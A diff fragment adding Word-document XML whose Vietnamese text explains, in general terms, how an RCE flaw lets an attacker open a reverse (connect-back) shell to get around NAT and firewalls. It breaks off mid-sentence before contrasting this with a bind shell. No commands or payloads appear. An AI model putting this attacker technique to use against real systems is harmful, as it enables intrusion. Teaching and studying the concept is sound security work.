+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thể</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>dẫn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>đến</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> RCE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thể</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>dùng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Reverse shell </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>để</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>tạo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>kết</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nối</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>đến</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> attacker </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>để</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hacker </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thao</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>tác</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>với</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> target. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Một</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Reverse shell (hay </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>còn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>gọi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> connect-back shell) </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>cũng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thể</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>là</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>cách</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>duy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nhất</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>để</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>để</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thao</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>tác</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> remote </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thông</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> qua shell </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>mà</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>không</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>gặp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>vấn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>đề</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>với</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> NAT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>hoặc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> firewall</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Như</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>bình</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thường</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>để</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thể</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>tạo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ra</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> remote shell </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>để</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> remote </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>từ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>xa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>tính</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>của</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> attacker </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>kết</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nối</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>tới</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>một</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>chủ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> target </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>và</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>yêu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>cầu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>một</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> shell session - </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>đây</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>gọi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
